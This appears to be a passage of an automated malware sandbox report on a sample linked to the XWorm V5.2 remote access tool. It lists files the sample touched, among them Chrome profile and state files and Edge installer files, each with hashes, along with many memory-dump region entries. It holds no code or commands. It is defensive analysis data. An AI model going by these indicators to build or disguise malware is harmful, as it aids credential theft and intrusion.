| SHA512 | b29f87bae891ba7951ef95d1ff4f05c881c70105be7affac0f25fbbbf9b1344c46129e15755e93fabc7d19f05fa4f87f732f099655bab5673392368f9adb4452 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | ebcabda9cf67bbf23b8229e7255d7a9f |
| SHA1 | b53dcab51b0da30b453ce73a461527ccf332a5ec |
| SHA256 | dfbcdac9a6c23b752c841541bc23da5b5566217f87098e76501aca46a964215f |
| SHA512 | 29e5e99663489441186e1af9507221f0c37d541fc635ba25e02fc5df7c4e9aa041bc0c89f509f61d6674300b0304a81e6c2e9493d6bcb2356c9cc8d952ef3848 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 5540dde8dccb6ceb2554c4dda9168f8f |
| SHA1 | b3964c16510ba40f38c5e2a1f6e40410ae2e5e44 |
| SHA256 | 547e1d1ac32389d249e4cb581731cc94ccc8b5e15967ffff6b48bd6a04e3fbe7 |
| SHA512 | 5c97b8159de025724729ef6904164f3ffc44193c6e3364eec37ac1990c43ec006e476baca6b99858cd1c9e87dda8273390c6f21a4b46656a994e8bd9d89524e6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f8aa51cafa42d98e5398a106a2e91725 |
| SHA1 | d2438a2eb338f6c730f18eada446dd79706c2a5c |
| SHA256 | 380d689d3a9490890676a73dd7270a0950485ce733963402edbbaae41eee4dfd |
| SHA512 | 32b40b0b9aa71a7dfcd51f513480818e49438b61aa9513666494a0607873a32dc09d636ec608fa2ed8493a2ad8dedfd70a84fe633e10b6fcc24f079fe8a2f771 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 1d729caf6e5a8ec684529c913551d059 |
| SHA1 | 4381ba4f74962f12bc8f8afadbce122d4756745e |
| SHA256 | 6d78ab2b7a6a7b82cc594faa7e0a9d8bee9044a3f665c7a701422a8e76e0f91b |
| SHA512 | 1e09fcd0e4f4ef143766b7967f1c5685758265cbe3e838ddd83f9c758490858d56c28abbde4d01df63efd8ba3f317bc5a4cc0b9aef877c5234423c87ea376cb5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | f4549d1a4954621c8a0f4d9959934184 |
| SHA1 | 744bc6cbafcddfea5909c45e55c088e0f30e4c4c |
| SHA256 | 7a9aa4f36177a325333b8203de5b42715b0334614989dc0d4330d369579551ee |
| SHA512 | 24213d755e3dea1e2b8e702be7c0960d5d8ef32281bb5c4de51c2a843c0a80e5edf49501c6cbb0b544af47c1de1b7e476560886c9b325e2f48f9d0312ce9f567 |
C:\Users\Admin\Desktop\XWorm V5.2\Icons\icon (15).ico
| MD5 | e3143e8c70427a56dac73a808cba0c79 |
| SHA1 | 63556c7ad9e778d5bd9092f834b5cc751e419d16 |
| SHA256 | b2f57a23ecc789c1bbf6037ac0825bf98babc7bf0c5d438af5e2767a27a79188 |
| SHA512 | 74e0f4b55625df86a87b9315e4007be8e05bbecca4346a6ea06ef5b1528acb5a8bb636ef3e599a3820dbddcf69563a0a22e2c1062c965544fd75ec96fd9803fc |
memory/5324-3494-0x0000000000370000-0x0000000000390000-memory.dmp
memory/5324-3495-0x0000015E43DE0000-0x0000015E43E22000-memory.dmp
memory/5324-3496-0x0000015E5C500000-0x0000015E5C528000-memory.dmp
memory/5324-3497-0x0000015E5C530000-0x0000015E5C536000-memory.dmp
memory/5324-3498-0x0000015E5C6F0000-0x0000015E5C74E000-memory.dmp
memory/5324-3499-0x0000015E5C750000-0x0000015E5C7A6000-memory.dmp
memory/5324-3500-0x0000015E424A0000-0x0000015E424A6000-memory.dmp
memory/5324-3501-0x0000015E424B0000-0x0000015E424B6000-memory.dmp
memory/5324-3502-0x0000015E5C6A0000-0x0000015E5C6DC000-memory.dmp
memory/5324-3503-0x0000015E5C670000-0x0000015E5C68A000-memory.dmp
memory/5324-3504-0x0000015E5D500000-0x0000015E5E138000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TMzpx\TMzpx.dll
| MD5 | 2f1a50031dcf5c87d92e8b2491fdcea6 |
| SHA1 | 71e2aaa2d1bb7dbe32a00e1d01d744830ecce08f |
| SHA256 | 47578a37901c82f66e4dba47acd5c3cab6d09c9911d16f5ad0413275342147ed |
| SHA512 | 1c66dbe1320c1a84023bdf77686a2a7ab79a3e86ba5a4ea2cda9a37f8a916137d5cfec30b28ceae181355f6f279270465ef63ae90b7e8dcd4c1a8198a7fd36a8 |
memory/5324-3511-0x0000015E5E940000-0x0000015E5F52C000-memory.dmp
memory/5324-3512-0x0000015E5D1F0000-0x0000015E5D3E4000-memory.dmp
memory/3956-3515-0x000001C4DD260000-0x000001C4DD261000-memory.dmp
memory/3956-3514-0x000001C4DD260000-0x000001C4DD261000-memory.dmp
memory/3956-3513-0x000001C4DD260000-0x000001C4DD261000-memory.dmp
memory/3956-3525-0x000001C4DD260000-0x000001C4DD261000-memory.dmp
memory/3956-3524-0x000001C4DD260000-0x000001C4DD261000-memory.dmp
memory/3956-3523-0x000001C4DD260000-0x000001C4DD261000-memory.dmp
memory/3956-3522-0x000001C4DD260000-0x000001C4DD261000-memory.dmp
memory/3956-3521-0x000001C4DD260000-0x000001C4DD261000-memory.dmp
memory/3956-3520-0x000001C4DD260000-0x000001C4DD261000-memory.dmp
memory/3956-3519-0x000001C4DD260000-0x000001C4DD261000-memory.dmp
C:\Program Files (x86)\Microsoft\EdgeUpdate\Download\{1FAB8CFE-9860-415C-A6CA-AA7D12021940}\2.0.0.34\BGAUpdate.exe
| MD5 | 3f208f4e0dacb8661d7659d2a030f36e |
| SHA1 | 07fe69fd12637b63f6ae44e60fdf80e5e3e933ff |
| SHA256 | d3c12e642d4b032e2592c2ba6e0ed703a7e43fb424b7c3ab5b2e51b53d1d433b |
| SHA512 | 6c8fce43d04dd7e7f5c8bf275ba01e24a76531e89cc02f4b2f23ab2086f7cf70f485c4240c5ea41bf61cb7ceee471df7e7bdc1b17dfdd54c22e4b02ff4e14740 |
C:\Program Files\MsEdgeCrashpad\settings.dat
| MD5 | 03769b901facfdbfcd55dfdd28604faa |
| SHA1 | f5e0d238aae2f9da57e92b0962e20474053fa66e |
| SHA256 | dcd0e48d8c3b8e62c2aaaa8c1a9365cb4fd9549e5eb4a91447d256573c7c249c |
| SHA512 | f71c1d59bc44092926115d6be1ceb52bf15010fdea05a911278ef5c7767beccd9d896c63792e6e9cca8e9df4252d955697d1b9813d2c52bad6c3ed85ce1d4fc1 |
C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\Installer\setup.exe
| MD5 | 7171f56da52529073c2bda6dad0fdcfa |
| SHA1 | f29fb1d1182e46895bb3ccc38e05220087e92e93 |
| SHA256 | 32c87af491ca80fc5c5594aa995669161b466957d7b444f3c388ece97b730aee |
| SHA512 | 8c81a87f1f77cbed95eff3986d14d7c05b919cdaeabfba0a1335331adadc1e97495332cb6d3969242a9d19f48aa9eb890f22b81f504af615ea5ff64b27c13c73 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\I3C6LG3F\error[1]
| MD5 | 16aa7c3bebf9c1b84c9ee07666e3207f |
| SHA1 | bf0afa2f8066eb7ee98216d70a160a6b58ec4aa1 |
| SHA256 | 7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754 |
| SHA512 | 245559f757bab9f3d63fb664ab8f2d51b9369e2b671cf785a6c9fb4723f014f5ec0d60f1f8555d870855cf9eb49f3951d98c62cbdf9e0dc1d28544966d4e70f1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\9O7X9C7J\error[1]
| MD5 | b9bec45642ff7a2588dc6cb4131ea833 |
| SHA1 | 4d150a53276c9b72457ae35320187a3c45f2f021 |
| SHA256 | b0abe318200dcde42e2125df1f0239ae1efa648c742dbf9a5b0d3397b903c21d |
| SHA512 | c119f5625f1fc2bcdb20ee87e51fc73b31f130094947ac728636451c46dced7b30954a059b24fef99e1db434581fd9e830abceb30d013404aac4a7bb1186ad3a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\J9NDGDSC\warning[1]
| MD5 | 124a9e7b6976f7570134b7034ee28d2b |
| SHA1 | e889bfc2a2e57491016b05db966fc6297a174f55 |
| SHA256 | 5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9 |
| SHA512 | ea1b3cc56bd41fc534aac00f186180345cb2c06705b57c88c8a6953e6ce8b9a2e3809ddb01daac66fa9c424d517d2d14fa45fbef9d74fef8a809b71550c7c145 |
memory/5324-3605-0x0000015E69A60000-0x0000015E69BC8000-memory.dmp
memory/4804-3616-0x00000000001C0000-0x00000000001CE000-memory.dmp
memory/5324-3619-0x0000015E62870000-0x0000015E6289C000-memory.dmp
memory/5324-3620-0x0000015E69BD0000-0x0000015E69EB2000-memory.dmp
memory/5324-3621-0x0000015E67B60000-0x0000015E67BE2000-memory.dmp
memory/5324-3622-0x0000015E69490000-0x0000015E69542000-memory.dmp
memory/4804-3639-0x000000001BB80000-0x000000001BC30000-memory.dmp
memory/4804-3640-0x000000001C360000-0x000000001C888000-memory.dmp
memory/4804-3642-0x0000000002360000-0x000000000236C000-memory.dmp
C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\Installer\setup.exe
| MD5 | 01cc712d5b9427fffe2495e444667809 |
| SHA1 | 47c967cfd31b1e8ce4fb6deb8ddc4fc97d76b65c |
| SHA256 | 3b7409c2d26acf633e1da0426f49f4d15c4610b632b64eeab00f3d4b67ae12d5 |
| SHA512 | f20e0b5fd763916f3c00effbe06862b2adf4973fdfa41862bc8ffe02894784a8218263d66538864758ba9ff16d816f0c7ea82d704bab1994e72c8ebd850ff59e |
memory/1944-3679-0x0000017374C90000-0x0000017374C9E000-memory.dmp
memory/1944-3680-0x0000017375150000-0x000001737515A000-memory.dmp
memory/1944-3681-0x0000017375180000-0x0000017375188000-memory.dmp
memory/1944-3682-0x0000017378600000-0x0000017378849000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html.~tmp
| MD5 | effecce1b6868c8bd7950ef7b772038b |
| SHA1 | 695d5a07f59b4b72c5eca7be77d5b15ae7ae59b0 |
| SHA256 | 003e619884dbc527e20f0aa8487daf5d7eed91d53ef6366a58c5493aaf1ce046 |
| SHA512 | 2f129689181ffe6fff751a22d4130bb643c5868fa0e1a852c434fe6f7514e3f1e5e4048179679dec742ec505139439d98e6dcc74793c18008db36c800d728be2 |
memory/4804-3818-0x000000001C890000-0x000000001CBE0000-memory.dmp
memory/936-3823-0x00007FFDAFB70000-0x00007FFDAFB80000-memory.dmp
memory/936-3825-0x00007FFDAFB70000-0x00007FFDAFB80000-memory.dmp
memory/936-3824-0x00007FFDAFB70000-0x00007FFDAFB80000-memory.dmp
memory/936-3826-0x00007FFDAFB70000-0x00007FFDAFB80000-memory.dmp
memory/936-3827-0x00007FFDAFB70000-0x00007FFDAFB80000-memory.dmp
memory/936-3828-0x00007FFDAD210000-0x00007FFDAD220000-memory.dmp
memory/936-3829-0x00007FFDAD210000-0x00007FFDAD220000-memory.dmp
memory/936-3853-0x00007FFDAFB70000-0x00007FFDAFB80000-memory.dmp
memory/936-3854-0x00007FFDAFB70000-0x00007FFDAFB80000-memory.dmp
memory/936-3855-0x00007FFDAFB70000-0x00007FFDAFB80000-memory.dmp
memory/936-3856-0x00007FFDAFB70000-0x00007FFDAFB80000-memory.dmp
memory/4804-3858-0x000000001BCB0000-0x000000001BCEA000-memory.dmp
memory/4804-3864-0x000000001B6D0000-0x000000001B6DE000-memory.dmp